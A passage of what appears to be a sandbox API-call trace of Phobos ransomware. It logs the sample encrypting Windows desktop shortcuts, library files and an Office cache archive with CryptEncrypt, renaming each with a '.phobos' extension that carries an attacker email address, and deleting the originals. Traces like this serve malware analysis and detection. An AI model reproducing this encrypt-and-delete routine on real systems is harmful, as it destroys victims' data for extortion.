phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0212.193] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.193] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf8, lpOverlapped=0x0) returned 1 [0212.194] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0212.194] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0212.195] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0212.195] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.195] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0212.195] CryptDestroyKey (hKey=0xa32a28) returned 1 [0212.195] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0212.195] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.195] CloseHandle (hObject=0x178) returned 1 [0212.195] CloseHandle (hObject=0x10c) returned 1 [0212.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms")) returned 1 [0212.196] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos", dwFileAttributes=0x23) returned 1 [0212.196] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0212.196] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2025) returned 1 [0212.196] CloseHandle (hObject=0x10c) returned 1 [0212.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk")) returned 0x20 [0212.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0212.197] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.197] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0212.198] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.198] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7e9, lpOverlapped=0x0) returned 1 [0212.198] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7f0, dwBufLen=0x7f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7f0) returned 1 [0212.198] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7f0, lpOverlapped=0x0) returned 1 [0212.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0212.202] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.202] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0212.202] CryptDestroyKey (hKey=0xa32a28) returned 1 [0212.202] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0212.202] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.202] CloseHandle (hObject=0x10c) returned 1 [0212.202] CloseHandle (hObject=0x178) returned 1 [0212.202] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk")) returned 1 [0212.203] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.204] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2257) returned 1 [0212.204] CloseHandle (hObject=0x178) returned 1 [0212.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk")) returned 0x20 [0212.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.204] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.204] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0212.220] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0212.220] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.220] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8d1, lpOverlapped=0x0) returned 1 [0212.220] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0) returned 1 [0212.220] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8e0, lpOverlapped=0x0) returned 1 [0212.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0212.221] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.221] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0212.221] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.221] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0212.221] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.221] CloseHandle (hObject=0x178) returned 1 [0212.221] CloseHandle (hObject=0xac) returned 1 [0212.222] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk")) returned 1 [0212.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0212.223] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1157) returned 1 [0212.223] CloseHandle (hObject=0xac) returned 1 [0212.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk")) returned 0x20 [0212.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0212.223] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.223] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0212.224] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.224] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x485, lpOverlapped=0x0) returned 1 [0212.225] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x490, dwBufLen=0x490 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x490) returned 1 [0212.225] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x490, lpOverlapped=0x0) returned 1 [0212.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0212.226] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.226] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0212.226] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.226] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0212.226] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.226] CloseHandle (hObject=0xac) returned 1 [0212.226] CloseHandle (hObject=0x178) returned 1 [0212.226] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk")) returned 1 [0212.227] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0212.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.228] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=876) returned 1 [0212.228] CloseHandle (hObject=0x178) returned 1 [0212.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms")) returned 0x20 [0212.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0212.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0212.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0212.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0212.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0212.229] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.229] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x36c, lpOverlapped=0x0) returned 1 [0212.382] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x370, dwBufLen=0x370 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x370) returned 1 [0212.382] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x370, lpOverlapped=0x0) returned 1 [0212.383] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0212.383] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0212.383] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0212.383] CryptDestroyKey (hKey=0xa328e8) returned 1 [0212.383] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0212.383] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.383] CloseHandle (hObject=0x178) returned 1 [0212.383] CloseHandle (hObject=0xac) returned 1 [0212.384] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms")) returned 1 [0212.385] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb98, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fc00 | out: phKey=0x2c9fc00*=0xa32928) returned 1 [0212.385] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fbe8, dwFlags=0x0) returned 1 [0212.385] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x2c9fbb4 | out: pbData=0x20f16c0, pdwDataLen=0x2c9fbb4) returned 1 [0212.385] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0212.385] GetProcAddress (hModule=0x76180000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x761ad668 [0212.385] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0212.385] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 Thread: id = 139 os_tid = 0x354 [0132.729] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22b7a90 [0132.730] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10000) returned 0x22c7a98 [0132.730] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x28) returned 0x2227790 [0132.730] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x110102) returned 0x3070020 [0132.731] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x50) returned 0x22277c0 [0132.731] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f960 | out: phKey=0x2e0f960*=0xa28998) returned 1 [0132.731] CryptSetKeyParam (hKey=0xa28998, dwParam=0x1, pbData=0x2e0f948, dwFlags=0x0) returned 1 [0132.731] CryptDecrypt (in: hKey=0xa28998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277c0, pdwDataLen=0x2e0f914 | out: pbData=0x22277c0, pdwDataLen=0x2e0f914) returned 1 [0132.731] CryptDestroyKey (hKey=0xa28998) returned 1 [0132.731] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76180000 [0132.731] GetProcAddress (hModule=0x76180000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x761ad650 [0132.731] Wow64DisableWow64FsRedirection (in: OldValue=0x2e0f9ac | out: OldValue=0x2e0f9ac*=0x0) returned 1 [0132.731] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277c0 | out: hHeap=0x20f0000) returned 1 [0132.731] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0132.773] ResetEvent (hEvent=0xec) returned 1 [0132.773] SetEvent (hEvent=0xf0) returned 1 [0132.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0132.774] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0132.774] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16972987) returned 1 [0132.774] CloseHandle (hObject=0x148) returned 1 [0132.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab")) returned 0x2020 [0132.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0132.774] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0132.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0132.775] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0132.775] ReadFile (in: hFile=0x148, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0133.263] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0133.263] ReadFile (in: hFile=0x148, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0133.696] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0133.696] ReadFile (in: hFile=0x148, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0134.352] CryptImportKey (in: hProv=0xa24cf8, 